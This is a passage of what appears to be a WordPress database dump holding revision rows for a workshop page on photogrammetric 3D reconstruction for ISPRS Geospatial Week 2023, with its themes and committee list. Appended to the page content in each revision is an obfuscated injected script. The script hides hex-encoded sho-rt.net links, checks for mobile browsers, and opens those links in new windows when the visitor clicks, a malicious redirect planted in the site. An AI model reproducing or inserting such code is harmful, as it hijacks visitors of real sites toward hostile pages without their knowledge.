)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:05:02','2022-12-16 14:05:02','',3449,'https://gsw2023.com/?p=3476',0,'revision','',0),
(3477,1,'2022-12-16 14:05:55','2022-12-16 14:05:55','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5></h5>\n<h5></h5>\n<h5><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6>Novel approaches to image orientation</h6>\n</li>\n<li>\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\n</li>\n<li>\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\n</li>\n<li>\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\n</li>\n<li>\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\n</li>\n<li>\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>\n<h6>Ronny Hänsch, Germany</h6>\n</li>\n<li>\n<h6>Mozhdeh Shahbazi, Canada</h6>\n</li>\n<li>\n<h6>Ewelina Rupnik, France</h6>\n</li>\n<li>\n<h6>Petra Helmholz, Australia</h6>\n</li>\n<li>\n<h6>Jianzhu Huai, China</h6>\n</li>\n<li>\n<h6>Michael Schmitt, Germany</h6>\n</li>\n<li>\n<h6>Dimitri Bulatov, Germany</h6>\n</li>\n<li>\n<h6>Saeid Homayouni, Canada</h6>\n</li>\n<li>\n<h6>David Belton, Australia</h6>\n</li>\n<li>\n<h6>Ahmed Shaker, Canada</h6>\n</li>\n<li>\n<h6>Gunho Sohn, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:05:55','2022-12-16 14:05:55','',3449,'https://gsw2023.com/?p=3477',0,'revision','',0),
(3478,1,'2022-12-16 14:07:03','2022-12-16 14:07:03','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: left;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5></h5>\n<h5></h5>\n<h5><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6>Novel approaches to image orientation</h6>\n</li>\n<li>\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\n</li>\n<li>\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\n</li>\n<li>\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\n</li>\n<li>\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\n</li>\n<li>\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>\n<h6>Ronny Hänsch, Germany</h6>\n</li>\n<li>\n<h6>Mozhdeh Shahbazi, Canada</h6>\n</li>\n<li>\n<h6>Ewelina Rupnik, France</h6>\n</li>\n<li>\n<h6>Petra Helmholz, Australia</h6>\n</li>\n<li>\n<h6>Jianzhu Huai, China</h6>\n</li>\n<li>\n<h6>Michael Schmitt, Germany</h6>\n</li>\n<li>\n<h6>Dimitri Bulatov, Germany</h6>\n</li>\n<li>\n<h6>Saeid Homayouni, Canada</h6>\n</li>\n<li>\n<h6>David Belton, Australia</h6>\n</li>\n<li>\n<h6>Ahmed Shaker, Canada</h6>\n</li>\n<li>\n<h6>Gunho Sohn, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( 